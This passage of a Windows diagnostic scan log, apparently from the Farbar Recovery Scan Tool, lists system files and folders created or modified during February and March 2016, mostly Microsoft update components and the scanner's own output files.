2016-03-09 16:33 - 2016-02-24 00:13 - 00540160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ChatApis.dll
2016-03-09 16:33 - 2016-02-24 00:09 - 01443328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRHInproc.dll
2016-03-09 16:33 - 2016-02-24 00:09 - 00793600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2016-03-09 16:33 - 2016-02-24 00:09 - 00552960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll
2016-03-09 16:33 - 2016-02-24 00:07 - 00890368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2016-03-09 16:33 - 2016-02-24 00:07 - 00342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll
2016-03-09 16:33 - 2016-02-24 00:04 - 01497088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPDMC.exe
2016-03-09 16:33 - 2016-02-24 00:03 - 00769536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll
2016-03-09 16:33 - 2016-02-23 23:57 - 02158592 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2016-03-09 16:33 - 2016-02-23 23:43 - 00184320 _____ (Microsoft Corporation) C:\WINDOWS\system32\fwbase.dll
2016-03-09 16:33 - 2016-02-23 23:22 - 00163328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fwbase.dll
2016-03-08 17:33 - 2016-03-08 17:34 - 00072040 _____ C:\Users\levilaing\Downloads\FRST.txt
2016-03-08 17:33 - 2016-03-08 17:33 - 02374144 _____ (Farbar) C:\Users\levilaing\Desktop\FRST64.exe
2016-03-08 17:29 - 2016-03-08 17:32 - 00000253 _____ C:\Users\levilaing\Downloads\Search.txt
2016-03-08 17:16 - 2016-03-09 20:35 - 00000000 ____D C:\FRST
2016-03-08 16:37 - 2016-03-08 16:38 - 00041639 _____ C:\Users\levilaing\Downloads\Addition.txt
2016-03-01 13:31 - 2016-03-01 13:31 - 00000860 _____ C:\WINDOWS\system32\Drivers\etc\hosts.bak
2016-03-01 13:26 - 2016-03-01 13:50 - 00000000 ____D C:\Users\levilaing\AppData\Local\NPE
2016-03-01 12:58 - 2016-02-23 05:27 - 02654872 _____ C:\WINDOWS\system32\CoreUIComponents.dll
2016-03-01 12:58 - 2016-02-23 04:32 - 08705672 _____ (Microsoft Corp.) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 04:31 - 00408120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AUDIOKSE.dll
2016-03-01 12:58 - 2016-02-23 04:21 - 22564328 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2016-03-01 12:58 - 2016-02-23 03:45 - 02773096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d11.dll
2016-03-01 12:58 - 2016-02-23 03:38 - 06952088 _____ (Microsoft Corp.) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2016-03-01 12:58 - 2016-02-23 03:27 - 21124344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2016-03-01 12:58 - 2016-02-23 02:58 - 00052224 _____ (Microsoft Corporation) C:\WINDOWS\system32\jsproxy.dll
2016-03-01 12:58 - 2016-02-23 02:29 - 00591872 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmsRouterSvc.dll
2016-03-01 12:58 - 2016-02-23 02:28 - 00275456 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioEndpointBuilder.dll
2016-03-01 12:58 - 2016-02-23 02:09 - 01054208 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiosrv.dll
2016-03-01 12:58 - 2016-02-23 02:00 - 02624512 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputService.dll
2016-03-01 12:58 - 2016-02-23 01:58 - 00345600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TextInputFramework.dll
2016-03-01 12:58 - 2016-02-23 01:30 - 01731584 _____ (Microsoft Corporation) C:\WINDOWS\system32\urlmon.dll
2016-03-01 12:58 - 2016-02-23 01:24 - 02755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2016-03-01 12:58 - 2016-02-23 00:52 - 11545600 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:50 - 09919488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 13382656 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2016-03-01 12:58 - 2016-02-23 00:39 - 02581504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2016-03-01 12:58 - 2016-02-23 00:36 - 12125696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2016-03-01 12:58 - 2016-02-08 21:24 - 00641536 _____ (Microsoft Corporation) C:\WINDOWS\system32\enterprisecsps.dll
2016-03-01 12:58 - 2016-02-08 21:04 - 01946624 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2016-03-01 12:57 - 2016-02-23 05:29 - 01030416 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2016-03-01 12:57 - 2016-02-23 05:29 - 00874968 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2016-03-01 12:57 - 2016-02-23 05:27 - 01317640 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2016-03-01 12:57 - 2016-02-23 05:27 - 01141504 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2016-03-01 12:57 - 2016-02-23 05:25 - 02152288 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
2016-03-01 12:57 - 2016-02-23 05:25 - 01818696 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2016-03-01 12:57 - 2016-02-23 05:25 - 00563552 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\acpi.sys
2016-03-01 12:57 - 2016-02-23 05:15 - 00779384 _____ (Microsoft Corporation) C:\WINDOWS\system32\taskschd.dll
2016-03-01 12:57 - 2016-02-23 05:08 - 00989536 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2016-03-01 12:57 - 2016-02-23 04:34 - 01859960 _____ C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2016-03-01 12:57 - 2016-02-23 04:34 - 01542816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00696160 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 04:33 - 00389992 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanapi.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 02544264 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01152328 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 01062480 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00498448 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 04:32 - 00369912 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2016-03-01 12:57 - 2016-02-23 04:31 - 01017032 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00819648 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00536256 _____ (Microsoft Corporation) C:\WINDOWS\system32\AudioSes.dll
2016-03-01 12:57 - 2016-02-23 04:31 - 00476728 _____ (Microsoft Corporation) C:\WINDOWS\system32\msvproc.dll
2016-03-01 12:57 - 2016-02-23 04:25 - 03671888 _____ (Microsoft Corporation) C:\WINDOWS\system32\iertutil.dll
2016-03-01 12:57 - 2016-02-23 04:22 - 00572272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\taskschd.dll
2016-03-01 12:57 - 2016-02-23 04:17 - 00146272 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\appid.sys
2016-03-01 12:57 - 2016-02-23 03:40 - 00430944 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb.sys
2016-03-01 12:57 - 2016-02-23 03:39 - 00502112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 02180136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfcore.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00980352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfasfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00895080 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00882720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00450912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2016-03-01 12:57 - 2016-02-23 03:38 - 00420928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msvproc.dll
2016-03-01 12:57 - 2016-02-23 03:37 - 00713824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2016-03-01 12:57 - 2016-02-23 03:32 - 00791744 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2016-03-01 12:57 - 2016-02-23 03:30 - 02919320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iertutil.dll
2016-03-01 12:57 - 2016-02-23 03:27 - 00376536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 03:25 - 00534368 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\USBHUB3.SYS
2016-03-01 12:57 - 2016-02-23 03:20 - 01139712 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblGameSave.dll
2016-03-01 12:57 - 2016-02-23 03:20 - 00238592 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xboxgip.sys
2016-03-01 12:57 - 2016-02-23 03:19 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\xinputhid.sys
2016-03-01 12:57 - 2016-02-23 03:17 - 00649216 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2016-03-01 12:57 - 2016-02-23 03:12 - 00077824 _____ (Microsoft Corporation) C:\WINDOWS\system32\provpackageapidll.dll
2016-03-01 12:57 - 2016-02-23 03:10 - 00027648 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiConfigSP.dll
2016-03-01 12:57 - 2016-02-23 03:07 - 00037376 _____ (Microsoft Corporation) C:\WINDOWS\system32\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 03:07 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvcpal.dll
2016-03-01 12:57 - 2016-02-23 03:06 - 00129536 _____ (Microsoft Corporation) C:\WINDOWS\system32\flvprophandler.dll
2016-03-01 12:57 - 2016-02-23 03:01 - 00104960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\rasl2tp.sys
2016-03-01 12:57 - 2016-02-23 03:00 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\EnterpriseDesktopAppMgmtCSP.dll
2016-03-01 12:57 - 2016-02-23 03:00 - 00048640 _____ (Microsoft Corporation) C:\WINDOWS\system32\wfdprov.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00069632 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:58 - 00025088 _____ (Microsoft Corporation) C:\WINDOWS\system32\irmon.dll
2016-03-01 12:57 - 2016-02-23 02:57 - 00199168 _____ (Microsoft Corporation) C:\WINDOWS\system32\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:56 - 02186864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d11.dll
2016-03-01 12:57 - 2016-02-23 02:55 - 00114688 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bridge.sys
2016-03-01 12:57 - 2016-02-23 02:53 - 00115712 _____ (Microsoft Corporation) C:\WINDOWS\system32\srpapi.dll
2016-03-01 12:57 - 2016-02-23 02:53 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngckeyenum.dll
2016-03-01 12:57 - 2016-02-23 02:52 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDMAppInstaller.exe
2016-03-01 12:57 - 2016-02-23 02:50 - 00159232 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2016-03-01 12:57 - 2016-02-23 02:48 - 00086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppCapture.dll
2016-03-01 12:57 - 2016-02-23 02:48 - 00041984 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 02:40 - 00074240 _____ (Microsoft Corporation) C:\WINDOWS\system32\SMSRouter.dll
2016-03-01 12:57 - 2016-02-23 02:39 - 00178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\psmsrv.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00320000 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 02:38 - 00287712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.MediaControl.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00617984 _____ (Microsoft Corporation) C:\WINDOWS\system32\StorSvc.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 02:37 - 00204288 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupSvc.dll
2016-03-01 12:57 - 2016-02-23 02:36 - 00216576 _____ (Microsoft Corporation) C:\WINDOWS\system32\QuickActionsDataModel.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifiprofilessettinghandler.dll
2016-03-01 12:57 - 2016-02-23 02:34 - 00189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 02:33 - 00558080 _____ (Microsoft Corporation) C:\WINDOWS\system32\MBMediaManager.dll
2016-03-01 12:57 - 2016-02-23 02:32 - 00414720 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2016-03-01 12:57 - 2016-02-23 02:31 - 00463360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansec.dll
2016-03-01 12:57 - 2016-02-23 02:27 - 00307712 _____ (Microsoft Corporation) C:\WINDOWS\system32\usbmon.dll
2016-03-01 12:57 - 2016-02-23 02:26 - 00372224 _____ (Microsoft Corporation) C:\WINDOWS\system32\MDEServer.exe
2016-03-01 12:57 - 2016-02-23 02:23 - 00412672 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlanmsm.dll
2016-03-01 12:57 - 2016-02-23 02:22 - 00567808 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00847360 _____ (Microsoft Corporation) C:\WINDOWS\system32\netlogon.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00606720 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00493568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 02:20 - 00330240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00948736 _____ (Microsoft Corporation) C:\WINDOWS\system32\XblAuthManager.dll
2016-03-01 12:57 - 2016-02-23 02:19 - 00517632 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2016-03-01 12:57 - 2016-02-23 02:18 - 00557056 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00828928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 02:14 - 00029696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LaunchWinApp.exe
2016-03-01 12:57 - 2016-02-23 02:12 - 00852480 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 02:11 - 00587776 _____ (Microsoft Corporation) C:\WINDOWS\system32\bisrv.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00997376 _____ (Microsoft Corporation) C:\WINDOWS\system32\schedsvc.dll
2016-03-01 12:57 - 2016-02-23 02:10 - 00474624 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 00988160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SharedStartModel.dll
2016-03-01 12:57 - 2016-02-23 02:09 - 00870400 _____ (Microsoft Corporation) C:\WINDOWS\system32\modernexecserver.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 01213440 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwansvc.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00065536 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininetlui.dll
2016-03-01 12:57 - 2016-02-23 02:06 - 00045568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jsproxy.dll
2016-03-01 12:57 - 2016-02-23 02:05 - 00161280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InstallAgent.exe
2016-03-01 12:57 - 2016-02-23 02:04 - 01131520 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00673792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 02:04 - 00382464 _____ (Microsoft Corporation) C:\WINDOWS\system32\wuuhext.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 01318912 _____ (Microsoft Corporation) C:\WINDOWS\system32\wifinetworkmanager.dll
2016-03-01 12:57 - 2016-02-23 02:02 - 00755712 _____ (Microsoft Corporation) C:\WINDOWS\system32\spoolsv.exe
2016-03-01 12:57 - 2016-02-23 02:02 - 00285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2016-03-01 12:57 - 2016-02-23 01:58 - 00175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00163840 _____ (Microsoft Corporation) C:\WINDOWS\system32\TimeBrokerServer.dll
2016-03-01 12:57 - 2016-02-23 01:58 - 00108544 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:57 - 00031744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TimeBrokerClient.dll
2016-03-01 12:57 - 2016-02-23 01:52 - 00456704 _____ (Microsoft Corporation) C:\WINDOWS\system32\ipnathlp.dll
2016-03-01 12:57 - 2016-02-23 01:50 - 00266752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSFlacDecoder.dll
2016-03-01 12:57 - 2016-02-23 01:49 - 00200704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DisplayManager.dll
2016-03-01 12:57 - 2016-02-23 01:48 - 00838144 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2016-03-01 12:57 - 2016-02-23 01:47 - 00157184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WiFiDisplay.dll
2016-03-01 12:57 - 2016-02-23 01:38 - 00480256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 01118208 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2016-03-01 12:57 - 2016-02-23 01:37 - 00613376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00713728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netlogon.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00379392 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmkvsrcsnk.dll
2016-03-01 12:57 - 2016-02-23 01:36 - 00250880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-03-01 12:57 - 2016-02-23 01:35 - 00400896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winspool.drv
2016-03-01 12:57 - 2016-02-23 01:31 - 00585216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.AccountsControl.dll
2016-03-01 12:57 - 2016-02-23 01:30 - 00646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.Store.dll
2016-03-01 12:57 - 2016-02-23 01:29 - 00349696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\NetSetupShim.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00555520 _____ (Microsoft Corporation) C:\WINDOWS\system32\SyncController.dll
2016-03-01 12:57 - 2016-02-23 01:28 - 00256512 _____ (Microsoft Corporation) C:\WINDOWS\system32\accountaccessor.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 04827136 _____ (Microsoft Corporation) C:\WINDOWS\system32\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 01105920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Audio.dll
2016-03-01 12:57 - 2016-02-23 01:24 - 00489984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.dll
2016-03-01 12:57 - 2016-02-23 01:22 - 01944576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputService.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00245760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TextInputFramework.dll
2016-03-01 12:57 - 2016-02-23 01:21 - 00133632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Core.TextInput.dll
2016-03-01 12:57 - 2016-02-23 01:20 - 00083456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\InputLocaleManager.dll
2016-03-01 12:57 - 2016-02-23 01:17 - 02635264 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 01:14 - 00990720 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 01:11 - 01390080 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Shell.dll
2016-03-01 12:57 - 2016-02-23 01:05 - 00503296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSync.dll
2016-03-01 12:57 - 2016-02-23 01:01 - 02295808 _____ (Microsoft Corporation) C:\WINDOWS\system32\wlansvc.dll
2016-03-01 12:57 - 2016-02-23 00:59 - 01500672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll
2016-03-01 12:57 - 2016-02-23 00:58 - 00450560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SyncController.dll
2016-03-01 12:57 - 2016-02-23 00:56 - 04412928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ExplorerFrame.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 04894208 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:55 - 02229760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2016-03-01 12:57 - 2016-02-23 00:53 - 01799168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll
2016-03-01 12:57 - 2016-02-23 00:51 - 00754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SettingSyncCore.dll
2016-03-01 12:57 - 2016-02-23 00:42 - 03425792 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:41 - 02912256 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:36 - 03666432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2016-03-01 12:57 - 2016-02-23 00:35 - 07533568 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2016-03-01 12:57 - 2016-02-23 00:33 - 02604032 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2016-03-01 12:57 - 2016-02-23 00:32 - 02793472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.dll
2016-03-01 12:57 - 2016-02-23 00:30 - 02061312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2016-03-01 12:57 - 2016-02-23 00:28 - 06740992 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2016-03-01 12:57 - 2016-02-08 22:28 - 00277856 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys
2016-03-01 12:57 - 2016-02-08 22:13 - 00185184 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys
2016-03-01 12:57 - 2016-02-08 21:18 - 00297472 _____ (Microsoft Corporation) C:\WINDOWS\system32\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:18 - 00237056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 01626624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2016-03-01 12:57 - 2016-02-08 21:07 - 00086016 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceEnroller.exe
2016-02-23 13:55 - 2016-02-23 13:55 - 00007238 _____ C:\Users\levilaing\Downloads\ACRB.txt
2016-02-16 17:08 - 2016-02-16 17:08 - 01046528 _____ C:\Users\levilaing\Downloads\MicrosoftFixit50848.msi
2016-02-12 13:50 - 2016-03-09 18:52 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-02-09 13:01 - 2016-01-29 00:57 - 04502352 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2016-02-09 13:01 - 2016-01-29 00:33 - 04064320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2016-02-09 13:01 - 2016-01-26 23:59 - 00304752 _____ (Microsoft Corporation) C:\WINDOWS\system32\systemreset.exe
2016-02-09 13:01 - 2016-01-26 23:57 - 01824264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2016-02-09 13:01 - 2016-01-26 23:57 - 00820704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:55 - 00081112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:46 - 02606824 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2016-02-09 13:01 - 2016-01-26 23:46 - 01270072 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinTypes.dll
2016-02-09 13:01 - 2016-01-26 23:44 - 00604928 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\cng.sys
2016-02-09 13:01 - 2016-01-26 23:44 - 00085320 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpenWith.exe
2016-02-09 13:01 - 2016-01-26 23:21 - 00162816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msorcl32.dll
2016-02-09 13:01 - 2016-01-26 23:15 - 00031232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:11 - 00118272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:10 - 00099840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\hlink.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00299008 _____ (Microsoft Corporation) C:\WINDOWS\system32\microsoft-windows-system-events.dll
2016-02-09 13:01 - 2016-01-26 23:08 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztrace_maps.dll
2016-02-09 13:01 - 2016-01-26 23:07 - 00203264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iassam.dll
2016-02-09 13:01 - 2016-01-26 23:04 - 00147456 _____ (Microsoft Corporation) C:\WINDOWS\system32\mtxoci.dll
2016-02-09 13:01 - 2016-01-26 23:02 - 00109056 _____ (Microsoft Corporation) C:\WINDOWS\system32\hlink.dll
